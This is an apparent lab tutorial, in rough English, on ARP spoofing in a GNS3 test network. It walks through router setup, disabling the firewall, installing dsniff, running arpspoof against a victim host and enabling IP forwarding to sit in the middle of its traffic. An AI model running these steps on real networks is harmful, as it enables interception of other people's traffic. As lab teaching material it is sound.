1. This test used the GNS3 1.5.2 version and VMware workstation professional 12 edition.
2. Network topology
|
|
3. We did to configure R1 router as a below table
|
en conf t int fa1/0 ip add dhcp no sh int fa0/0 ip add 192.168.101.254 255.255.255.0 no sh int fa0/1 ip add 192.168.102.254 255.255.255.0 no sh end
|
4. Please you would need to enter show interface summary of each ESW switche for confirming connection between switch and host.
5. You have to assign ip address, subnet mask and a default gateway on desktop systems after to login as root.
ip addr add 192.168.XXX.X/24
route add default gw 192.168.XXX.X
6. We decided to role in this test. An attacker is host1. A victime is host2. The host3 will use later.
7. To stop and disable a firewall service on host1
# service iptables stop
# chkconfig iptables off
8. Before let's install packages needed for ARP spoofing, we should check out what the system can resolve from name to ip address. if it not to resolve, we should edit a file "/etc/resolv.conf" like this "nameserver 8.8.8.8" and to test ping like this "ping www.yahoo.com"
Are you success in this test? So to go next step.
9. Let's install packages to releated ARP spooging and others.
# yum -y install epel-release
# yum -y install dsniff
10. Let's do ARP spoofing to target host2
# arpspoof -i eth0 -t 192.168.101.2 192.168.101.254 &
11. If you are success , you can see the same mac address both 192.168.101.254 and 192.168.101.1 on host2 system like below. Oh sorry, Enter command "arp -e"
|
192.168.101.254 ether 00:0C:29:11:3E:02 C eth0 |
12. Do you why doesn't connect to Internet on host2? Because that's right gateway's mac is wrong. but we will be sucess to connect Internet keeping this status. How does we do? This's right to make router the attacker system.
# sysctl net.ipv4.ip_forward=1
13. Do execute! ping to www.yahoo.com. are you success?